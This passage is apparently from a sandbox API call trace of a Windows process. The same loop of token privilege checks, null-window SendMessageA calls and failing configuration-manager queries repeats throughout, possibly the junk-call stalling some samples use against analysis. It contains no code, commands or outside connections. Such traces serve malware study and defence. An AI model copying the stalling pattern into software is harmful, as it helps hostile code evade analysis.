RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.797] SetLastError (dwErrCode=0x522) [0084.797] CloseHandle (hObject=0x114) returned 1 [0084.797] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.797] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.797] GetLastError () returned 0x578 [0084.797] SetLastError (dwErrCode=0x578) [0084.797] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.797] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.797] GetCurrentThread () returned 0xfffffffe [0084.797] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.798] GetLastError () returned 0x3f0 [0084.798] GetCurrentProcess () returned 0xffffffff [0084.798] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.798] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.798] SetLastError (dwErrCode=0x522) [0084.798] CloseHandle (hObject=0x114) returned 1 [0084.798] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.798] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.798] GetLastError () returned 0x578 [0084.798] SetLastError (dwErrCode=0x578) [0084.798] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.798] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.798] GetCurrentThread () returned 0xfffffffe [0084.798] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.798] GetLastError () returned 0x3f0 [0084.798] GetCurrentProcess () returned 0xffffffff [0084.798] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.798] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.798] SetLastError (dwErrCode=0x522) [0084.798] CloseHandle (hObject=0x114) returned 1 [0084.798] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.798] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.798] GetLastError () returned 0x578 [0084.798] SetLastError (dwErrCode=0x578) [0084.798] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.798] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.798] GetCurrentThread () returned 0xfffffffe [0084.798] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.798] GetLastError () returned 0x3f0 [0084.798] GetCurrentProcess () returned 0xffffffff [0084.798] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.799] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.799] SetLastError (dwErrCode=0x522) [0084.799] CloseHandle (hObject=0x114) returned 1 [0084.799] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.799] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.799] GetLastError () returned 0x578 [0084.799] SetLastError (dwErrCode=0x578) [0084.799] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.799] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.799] GetCurrentThread () returned 0xfffffffe [0084.799] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.799] GetLastError () returned 0x3f0 [0084.799] GetCurrentProcess () returned 0xffffffff [0084.799] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.799] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.799] SetLastError (dwErrCode=0x522) [0084.799] CloseHandle (hObject=0x114) returned 1 [0084.799] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.799] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.799] GetLastError () returned 0x578 [0084.799] SetLastError (dwErrCode=0x578) [0084.799] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.799] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.799] GetCurrentThread () returned 0xfffffffe [0084.799] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.799] GetLastError () returned 0x3f0 [0084.799] GetCurrentProcess () returned 0xffffffff [0084.799] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.799] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.799] SetLastError (dwErrCode=0x522) [0084.799] CloseHandle (hObject=0x114) returned 1 [0084.799] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.799] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.799] GetLastError () returned 0x578 [0084.799] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.799] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.799] GetCurrentThread () returned 0xfffffffe [0084.799] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.799] GetLastError () returned 0x3f0 [0084.799] GetCurrentProcess () returned 0xffffffff [0084.799] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.799] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.800] SetLastError (dwErrCode=0x522) [0084.800] CloseHandle (hObject=0x114) returned 1 [0084.800] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.800] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.800] GetLastError () returned 0x578 [0084.800] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.800] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.800] GetCurrentThread () returned 0xfffffffe [0084.800] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.800] GetLastError () returned 0x3f0 [0084.800] GetCurrentProcess () returned 0xffffffff [0084.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.800] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.800] SetLastError (dwErrCode=0x522) [0084.800] CloseHandle (hObject=0x114) returned 1 [0084.800] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.800] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.800] GetLastError () returned 0x578 [0084.800] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.800] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.800] GetCurrentThread () returned 0xfffffffe [0084.800] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.800] GetLastError () returned 0x3f0 [0084.800] GetCurrentProcess () returned 0xffffffff [0084.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.800] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.800] SetLastError (dwErrCode=0x522) [0084.800] CloseHandle (hObject=0x114) returned 1 [0084.800] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.800] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.800] GetLastError () returned 0x578 [0084.800] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.800] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.800] GetCurrentThread () returned 0xfffffffe [0084.800] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.800] GetLastError () returned 0x3f0 [0084.800] GetCurrentProcess () returned 0xffffffff [0084.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.801] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.801] SetLastError (dwErrCode=0x522) [0084.801] CloseHandle (hObject=0x114) returned 1 [0084.801] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.801] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.801] GetLastError () returned 0x578 [0084.801] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.801] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.801] GetCurrentThread () returned 0xfffffffe [0084.801] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.801] GetLastError () returned 0x3f0 [0084.801] GetCurrentProcess () returned 0xffffffff [0084.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.801] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.801] SetLastError (dwErrCode=0x522) [0084.801] CloseHandle (hObject=0x114) returned 1 [0084.801] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.801] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.801] GetLastError () returned 0x578 [0084.801] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.801] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.801] GetCurrentThread () returned 0xfffffffe [0084.801] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.801] GetLastError () returned 0x3f0 [0084.801] GetCurrentProcess () returned 0xffffffff [0084.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.801] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.801] SetLastError (dwErrCode=0x522) [0084.801] CloseHandle (hObject=0x114) returned 1 [0084.801] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.801] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.801] GetLastError () returned 0x578 [0084.801] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.801] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.801] GetCurrentThread () returned 0xfffffffe [0084.802] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.802] GetLastError () returned 0x3f0 [0084.802] GetCurrentProcess () returned 0xffffffff [0084.802] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.802] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.802] SetLastError (dwErrCode=0x522) [0084.802] CloseHandle (hObject=0x114) returned 1 [0084.802] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.802] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.802] GetLastError () returned 0x578 [0084.802] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.802] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.802] GetCurrentThread () returned 0xfffffffe [0084.802] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.802] GetLastError () returned 0x3f0 [0084.802] GetCurrentProcess () returned 0xffffffff [0084.802] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.802] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.802] SetLastError (dwErrCode=0x522) [0084.802] CloseHandle (hObject=0x114) returned 1 [0084.802] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.802] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.802] GetLastError () returned 0x578 [0084.802] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.802] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.802] GetCurrentThread () returned 0xfffffffe [0084.802] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.802] GetLastError () returned 0x3f0 [0084.802] GetCurrentProcess () returned 0xffffffff [0084.802] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.802] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.802] SetLastError (dwErrCode=0x522) [0084.802] CloseHandle (hObject=0x114) returned 1 [0084.802] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.802] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.802] GetLastError () returned 0x578 [0084.803] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.803] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.803] GetCurrentThread () returned 0xfffffffe [0084.803] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.803] GetLastError () returned 0x3f0 [0084.803] GetCurrentProcess () returned 0xffffffff [0084.803] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.803] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.803] SetLastError (dwErrCode=0x522) [0084.803] CloseHandle (hObject=0x114) returned 1 [0084.803] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.803] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.803] GetLastError () returned 0x578 [0084.803] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.803] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.803] GetCurrentThread () returned 0xfffffffe [0084.803] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.803] GetLastError () returned 0x3f0 [0084.803] GetCurrentProcess () returned 0xffffffff [0084.803] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.803] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.803] SetLastError (dwErrCode=0x522) [0084.803] CloseHandle (hObject=0x114) returned 1 [0084.803] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.803] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.803] GetLastError () returned 0x578 [0084.803] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.803] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.803] GetCurrentThread () returned 0xfffffffe [0084.803] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.803] GetLastError () returned 0x3f0 [0084.803] GetCurrentProcess () returned 0xffffffff [0084.803] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.803] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.803] SetLastError (dwErrCode=0x522) [0084.803] CloseHandle (hObject=0x114) returned 1 [0084.804] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.804] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.804] GetLastError () returned 0x578 [0084.804] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.804] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.804] GetCurrentThread () returned 0xfffffffe [0084.804] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.804] GetLastError () returned 0x3f0 [0084.804] GetCurrentProcess () returned 0xffffffff [0084.804] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.804] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.804] SetLastError (dwErrCode=0x522) [0084.804] CloseHandle (hObject=0x114) returned 1 [0084.804] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.804] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.804] GetLastError () returned 0x578 [0084.804] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.804] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.804] GetCurrentThread () returned 0xfffffffe [0084.804] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.804] GetLastError () returned 0x3f0 [0084.804] GetCurrentProcess () returned 0xffffffff [0084.804] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.804] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.804] SetLastError (dwErrCode=0x522) [0084.804] CloseHandle (hObject=0x114) returned 1 [0084.804] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.804] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.804] GetLastError () returned 0x578 [0084.804] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.804] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.804] GetCurrentThread () returned 0xfffffffe [0084.804] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.804] GetLastError () returned 0x3f0 [0084.804] GetCurrentProcess () returned 0xffffffff [0084.804] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.804] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.805] SetLastError (dwErrCode=0x522) [0084.805] CloseHandle (hObject=0x114) returned 1 [0084.805] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.805] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.805] GetLastError () returned 0x578 [0084.805] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.805] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.805] GetCurrentThread () returned 0xfffffffe [0084.805] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.805] GetLastError () returned 0x3f0 [0084.805] GetCurrentProcess () returned 0xffffffff [0084.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.805] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.805] SetLastError (dwErrCode=0x522) [0084.805] CloseHandle (hObject=0x114) returned 1 [0084.805] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.805] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.805] GetLastError () returned 0x578 [0084.805] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.805] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.805] GetCurrentThread () returned 0xfffffffe [0084.805] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.805] GetLastError () returned 